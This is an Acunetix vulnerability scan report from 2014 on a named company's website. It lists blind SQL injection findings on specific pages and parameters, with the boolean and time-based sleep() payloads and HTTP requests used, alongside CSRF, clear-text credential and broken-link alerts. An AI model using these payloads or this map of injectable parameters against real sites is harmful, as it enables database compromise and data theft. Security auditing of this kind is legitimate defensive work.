developer report
DESCRIPTION
developTRANSCRIPT
-
Acunetix Website Audit 16 May, 2014
Developer Report
Generated by Acunetix WVS Reporter (v9.0 Build 20130904)
-
Scan of http://www.cerroazul.com.bo:80/
Scan information
Scan details
Start time 16/05/2014 08:49:53 a.m.Finish time 16/05/2014 09:26:18 a.m.Scan time 36 minutes, 24 secondsProfile Sql_InjectionServer informationResponsive TrueServer banner Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_fastcgi/mod_fastcgi-SNAP-0910052141Server OS UnixServer technologies PHP
Threat levelAcunetix Threat Level 3One or more high-severity type vulnerabilities have been discovered by the scanner. Amalicious user can exploit these vulnerabilities and compromise the backend databaseand/or deface your website.
Alerts distribution
HighMediumLowInformational 13
0131137Total alerts found
Knowledge baseList of client scriptsThese files contain Javascript code referenced from the website. - /common/js/accordionmenu.js- /common/js/jquery.min.js- /common/js/cargar_index.js- /common/js/banner/jquery.nivo.slider.pack.js- /common/js/banner/jquery.nivo.slider.js- /common/js/gallery_bottom/jquery.js- /common/js/gallery_bottom/jquery.easing.1.3.js- /common/js/gallery_bottom/jquery.cssAnimate.mini.js- /common/js/gallery_bottom/jquery.touchwipe.min.js- /common/js/gallery_bottom/jquery.mousewheel.min.js- /common/js/gallery_bottom/jquery.themepunch.services.min.js- /common/js/mapa.js- /common/js/gmaps.js- /common/js/login.js- /common/js/jquery.md5.js- /common/js/cargar_contacto.js- /common/js/comentario.js- /common/js/cargar_cata.js- /common/js/parametros.js- /common/js/registrarse.js
2Acunetix Website Audit
-
- /common/js/jquery.history.js- /common/js/jquery.galleriffic.js- /common/js/jquery.opacityrollover.js- /common/js/cargar_descripcion.js- /common/js/actualizar_visita_cata.js- /common/js/cargar_grupo.js- /common/js/buscar.js- /common/js/ubicaciones.js- /common/js/search.js- /common/jquery/jquery-1.4.2.js- /common/jquery/ui/jquery.ui.core.js- /common/jquery/ui/jquery.ui.widget.js- /common/jquery/ui/jquery.ui.position.js- /common/jquery/ui/jquery.ui.autocomplete.js- /common/jquery/jquery-1.7.js- /common/jquery/jquery-1.7.min.js List of files with inputsThese files have at least one input (GET or POST). - /common.php - 2 inputs- /mapa.php - 1 inputs- /sesion.php - 3 inputs- /about.php - 1 inputs- /index.php - 1 inputs- /contacto.php - 2 inputs- /comentario.php - 2 inputs- /common/php/empresa/get_empresas.php - 1 inputs- /common/php/search/get-datos.php - 1 inputs- /common/php/search/get_datespag2.php - 1 inputs- /common/php/catalogo/get_datos_descripcion.php - 1 inputs- /common/php/catalogo/actualizar_cata.php - 1 inputs- /common/php/contacto/get-datos.php - 1 inputs- /common/php/contacto/enviar_datos.php - 1 inputs- /common/php/comentario/get_datos.php - 1 inputs- /common/php/comentario/get-datespag.php - 1 inputs- /common/php/comentario/insertar_come.php - 1 inputs- /catalogo.php - 1 inputs- /suscribirse.php - 2 inputs- /descripcion.php - 1 inputs- /catalogo_grupo.php - 1 inputs- /empresa.php - 1 inputs- /privacidad.php - 1 inputs- /listado.php - 1 inputs List of external hostsThese hosts were linked from this website but they were not scanned because they are not listed in the list of hostsallowed.(Settings->Scanners settings->Scanner->List of hosts allowed). - maps.google.com
Alerts summary
3Acunetix Website Audit
-
Blind SQL InjectionAffects Variations1/about.php
1/catalogo.php2/catalogo_grupo.php1/comentario.php1/common.php2/common/php/catalogo/get_datos_descripcion.php1/common/php/comentario/get_datos.php1/common/php/search/get-datos.php1/contacto.php
HTML form without CSRF protectionAffects Variations1/comentario.php
1/common.php1/contacto.php1/listado.php3/sesion.php2/suscribirse.php
User credentials are sent in clear textAffects Variations1/listado.php
1/sesion.php2/suscribirse.php
Broken linksAffects Variations1/common/css/ie-css3.htc
1/common/css/menuUni.css1/common/css/minilistas_fcl.css1/common/css/minilistasfcl.css1/common/css/spritefcl.css1/common/css/spritefcl_class.css1/listado_empresas.php1/www.facebook.com/BarracaCerroAzul
Password type input with auto-complete enabledAffects Variations1/empresa.php
1/listado.php1/privacidad.php1/sesion.php1/suscribirse.php
4Acunetix Website Audit
-
Alert detailsBlind SQL Injection
HighSeverityValidationTypeScripting (Blind_Sql_Injection.script)Reported by module
Impact
DescriptionThis script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn'tproperly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it isrelatively easy to protect against, there is a large number of web applications vulnerable.
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of yourdatabase and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system accessfor the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shellcommands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database serverfunctions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.RecommendationYour script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability.References
OWASP Injection FlawsAcunetix SQL Injection AttackHow to check for SQL injection vulnerabilitiesSQL Injection WalkthroughOWASP PHP Top 5VIDEO: SQL Injection tutorial
Affected items
Details/about.php
URL encoded GET input id was set to 2/**/AND/**/810=810 Tests performed: - 0+0+0+2 => TRUE- 0+810*805+2 => FALSE- 12-5-2-999 => FALSE- 12-5-2-3 => TRUE- 12-2*5+0+0+1-1 => TRUE- 12-2*6+0+0+1-1 => FALSE- 2 AND 2+1-1-1=1 AND 810=810 => TRUE- 2 AND 3+1-1-1=1 AND 810=810 => FALSE[ ... (line truncated)GET /about.php?id=2/**/AND/**/810%3d810 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/
Request headers
5Acunetix Website Audit
-
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Details/catalogo.php
URL encoded GET input id was set to 2/**/AND/**/943=943 Tests performed: - 0+0+0+2 => TRUE- 0+943*938+2 => FALSE- 12-5-2-999 => FALSE- 12-5-2-3 => TRUE- 12-2*5+0+0+1-1 => TRUE- 12-2*6+0+0+1-1 => FALSE- 2 AND 2+1-1-1=1 AND 943=943 => TRUE- 2 AND 3+1-1-1=1 AND 943=943 => FALSE[ ... (line truncated)GET /catalogo.php?id=2/**/AND/**/943%3d943 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/catalogo_grupo.php
URL encoded GET input id_fami was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ =>6.63 s- if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ ...(line truncated)GET/catalogo_grupo.php?id=1&id_fami=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&id_grupo=13 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
6Acunetix Website Audit
-
Details/catalogo_grupo.php
URL encoded GET input id_grupo was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ =>9.532 s- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR" ...(line truncated)GET/catalogo_grupo.php?id=1&id_fami=3&id_grupo=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/comentario.php
URL encoded GET input id was set to 2/**/AND/**/505=505 Tests performed: - 0+0+0+2 => TRUE- 0+505*500+2 => FALSE- 12-5-2-999 => FALSE- 12-5-2-3 => TRUE- 12-2*5+0+0+1-1 => TRUE- 12-2*6+0+0+1-1 => FALSE- 2 AND 2+1-1-1=1 AND 505=505 => TRUE- 2 AND 3+1-1-1=1 AND 505=505 => FALSE[ ... (line truncated)GET /comentario.php?id=2/**/AND/**/505%3d505 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/common.php
URL encoded GET input id was set to 2/**/AND/**/757=757 Tests performed: - 0+0+0+2 => TRUE- 0+757*752+2 => FALSE- 12-5-2-999 => FALSE- 12-5-2-3 => TRUE- 12-2*5+0+0+1-1 => TRUE- 12-2*6+0+0+1-1 => FALSE- 2 AND 2+1-1-1=1 AND 757=757 => TRUE- 2 AND 3+1-1-1=1 AND 757=757 => FALSE[ ... (line truncated)Request headers
7Acunetix Website Audit
-
GET /common.php?id=2/**/AND/**/757%3d757 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Details/common/php/catalogo/get_datos_descripcion.php
URL encoded GET input id_cata was set to 9/**/AND/**/407=407 Tests performed: - 0+0+0+9 => TRUE- 0+407*402+9 => FALSE- 19-5-2-999 => FALSE- 19-5-2-3 => TRUE- 19-2*5+0+0+1-1 => TRUE- 19-2*6+0+0+1-1 => FALSE- 9 AND 2+1-1-1=1 AND 407=407 => TRUE- 9 AND 3+1-1-1=1 AND 407=407 => FALSE[/b ... (line truncated)GET/common/php/catalogo/get_datos_descripcion.php?id_cata=9/**/AND/**/407%3d407&id_empre=1HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/common/php/catalogo/get_datos_descripcion.php
URL encoded GET input id_empre was set to 1/**/AND/**/938=938 Tests performed: - 0+0+0+1 => TRUE- 0+938*933+1 => FALSE- 11-5-2-999 => FALSE- 11-5-2-3 => TRUE- 11-2*5+0+0+1-1 => TRUE- 11-2*6+0+0+1-1 => FALSE- 1 AND 2+1-1-1=1 AND 938=938 => TRUE- 1 AND 3+1-1-1=1 AND 938=938 => FALSE[/ ... (line truncated)GET/common/php/catalogo/get_datos_descripcion.php?id_cata=9&id_empre=1/**/AND/**/938%3d938HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
8Acunetix Website Audit
-
Details/common/php/comentario/get_datos.php
URL encoded GET input id_empre was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.105 s- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR" ...(line truncated)GET/common/php/comentario/get_datos.php?id_empre=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/common/php/search/get-datos.php
URL encoded GET input id_dpto was set to 1/**/AND/**/32=32 Tests performed: - 0+0+0+1 => TRUE- 0+32*27+1 => FALSE- 11-5-2-999 => FALSE- 11-5-2-3 => TRUE- 11-2*5+0+0+1-1 => TRUE- 11-2*6+0+0+1-1 => FALSE- 1 AND 2+1-1-1=1 AND 32=32 => TRUE- 1 AND 3+1-1-1=1 AND 32=32 => FALSE[/li ... (line truncated)GET /common/php/search/get-datos.php?id_dpto=1/**/AND/**/32%3d32¶metro= HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/contacto.php
URL encoded GET input id was set to 2/**/AND/**/918=918 Tests performed: - 0+0+0+2 => TRUE- 0+918*913+2 => FALSE- 12-5-2-999 => FALSE- 12-5-2-3 => TRUE- 12-2*5+0+0+1-1 => TRUE- 12-2*6+0+0+1-1 => FALSE- 2 AND 2+1-1-1=1 AND 918=918 => TRUE- 2 AND 3+1-1-1=1 AND 918=918 => FALSE[ ... (line truncated)Request headers
9Acunetix Website Audit
-
GET /contacto.php?id=2/**/AND/**/918%3d918 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.cerroazul.com.bo:80/Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
10Acunetix Website Audit
-
HTML form without CSRF protectionMediumSeverityInformationalTypeCrawlerReported by module
Impact
DescriptionThis alert may be a false positive, manual confirmation is required.Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is atype of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the websitetrusts. Acunetix WVS found a HTML form with no apparent CSRF protection implemented. Consult details for more informationabout the affected HTML form.
An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRFexploit can compromise end user data and operation in case of normal user. If the targeted end user is the administratoraccount, this can compromise the entire web application.RecommendationCheck if this form requires CSRF protection and implement CSRF countermeasures if necessary.
Affected items
Details/comentario.php
Form name: Form action: http://www.cerroazul.com.bo/comentario.phpForm method: GET Form inputs: - name [Text]- comentario [TextArea]
GET /comentario.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
11Acunetix Website Audit
-
Details/common.php
Form name: Form action: http://www.cerroazul.com.bo/common.phpForm method: GET Form inputs: - name [Text]- phone [Text]- mensaje [TextArea]
GET /common.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/Acunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/contacto.php
Form name: Form action: http://www.cerroazul.com.bo/contacto.phpForm method: GET Form inputs: - name [Text]- correo [Text]- phone [Text]- mensaje [TextArea]
GET /contacto.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
12Acunetix Website Audit
-
Details/listado.php
Form name: Form action: http://www.cerroazul.com.bo/listado.phpForm method: POST Form inputs: - txt_nombre [Text]- password [Password]
GET /listado.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/contacto.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/sesion.php
Form name: Form action: http://www.cerroazul.com.bo/sesion.phpForm method: POST Form inputs: - usuario [Text]- phone [Text]- phone [Text]- password [Text]
GET /sesion.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
13Acunetix Website Audit
-
Details/sesion.php
Form name: Form action: http://www.cerroazul.com.bo/sesion.phpForm method: POST Form inputs: - phone [Text]
GET /sesion.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/sesion.php
Form name: Form action: http://www.cerroazul.com.bo/sesion.phpForm method: POST Form inputs: - phone [Text]- password [Password]
GET /sesion.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
14Acunetix Website Audit
-
Details/suscribirse.php
Form name: Form action: http://www.cerroazul.com.bo/suscribirse.phpForm method: POST Form inputs: - txt_usuario [Text]- password [Password]
GET /suscribirse.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/suscribirse.php
Form name: Form action: http://www.cerroazul.com.bo/suscribirse.phpForm method: POST Form inputs: - txt_nombre [Text]- name [Text]- phone [Text]- password [Password]
GET /suscribirse.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
15Acunetix Website Audit
-
User credentials are sent in clear textMediumSeverityInformationalTypeCrawlerReported by module
Impact
DescriptionUser credentials are transmitted over an unencrypted channel. This information should always be transferred via anencrypted channel (HTTPS) to avoid being intercepted by malicious users.
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.RecommendationBecause user credentials are considered sensitive information, should always be transferred to the server over anencrypted connection (HTTPS).
Affected items
Details/listado.php
Form name: Form action: http://www.cerroazul.com.bo/listado.phpForm method: POST Form inputs: - txt_nombre [Text]- password [Password]
GET /listado.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/contacto.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/sesion.php
Form name: Form action: http://www.cerroazul.com.bo/sesion.phpForm method: POST Form inputs: - phone [Text]- password [Password] Request headers
16Acunetix Website Audit
-
GET /sesion.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Details/suscribirse.php
Form name: Form action: http://www.cerroazul.com.bo/suscribirse.phpForm method: POST Form inputs: - txt_usuario [Text]- password [Password]
GET /suscribirse.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/suscribirse.php
Form name: Form action: http://www.cerroazul.com.bo/suscribirse.phpForm method: POST Form inputs: - txt_nombre [Text]- name [Text]- phone [Text]- password [Password]
GET /suscribirse.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalerts
Request headers
17Acunetix Website Audit
-
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
18Acunetix Website Audit
-
Broken linksInformationalSeverityInformationalTypeCrawlerReported by module
Impact
DescriptionA broken link refers to any link that should take you to a document, image or webpage, that actually results in an error.This page was linked from the website but it is inaccessible.
Problems navigating the site.RecommendationRemove the links to this file or make it accessible.
Affected items
Details/common/css/ie-css3.htc
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.GET /common/css/ie-css3.htc HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common/css/menu_acor.cssAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/common/css/menuUni.css
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.GET /common/css/menuUni.css HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
19Acunetix Website Audit
-
Details/common/css/minilistas_fcl.css
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.GET /common/css/minilistas_fcl.css HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/common/css/minilistasfcl.css
